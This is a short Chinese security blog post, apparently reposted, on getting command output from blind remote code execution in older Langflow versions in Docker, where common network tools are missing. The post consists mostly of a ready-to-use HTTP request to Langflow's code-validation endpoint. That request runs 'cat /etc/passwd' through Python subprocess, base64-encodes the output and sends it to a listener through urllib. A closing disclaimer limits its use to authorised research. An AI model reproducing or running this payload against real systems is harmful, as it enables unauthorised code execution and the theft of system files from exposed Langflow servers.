文章总结： 该文档介绍在Langflow老版本Docker环境中实现无回显命令执行的技巧。由于环境限制（缺乏常用网络工具且无法直接写文件），作者提出通过Python的urllib模块构造HTTP请求外带命令执行结果，并提供了具体的恶意代码示例，利用subprocess执行系统命令后通过base64编码将数据外传至指定服务器。 综合评分： 75 文章分类： WEB安全,渗透测试,红队,代码审计,安全工具

langflow 命令执行 无回显小思路

原创

e0mlja e0mlja

e0m安全屋

2026年3月24日 11:23 四川

在小说阅读器读本章

去阅读

水个文章玩儿。

看到有个朋友写了langflow老版本的命令执行，不考虑内存马的情况下，做命令执行的回显。

一般的思路是带外，写文件到可访问目录下。这里的情况有点特殊

（1）docker环境里面 curl wget dis nslookup ping等命令不可用。bash原生的命令很少

（2）python打包运行之前文件已经处理好了 ，没办法直接写静态目录下访问（访问会304）,

（3）直接反弹shell 进程卡死了，真实环境肯定不可用。

考虑到会外接api 所以机器一般都会出网，这里采用python的http服务，打一个http的外带执行命令。

代码如下

POST /api/v1/validate/code HTTP/1.1Content-Type: application/jsonHost: 127.0.0.1:7860{  "code": "def foo(p=__import__('urllib.request', fromlist=['urlopen']).urlopen('http://host.docker.internal:9076/log?data=' + __import__('base64').b64encode(__import__('subprocess').check_output('cat /etc/passwd', shell=True).strip()).decode())): pass"}

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：e0m安全屋 e0mlja e0mlja《langflow 命令执行 无回显小思路》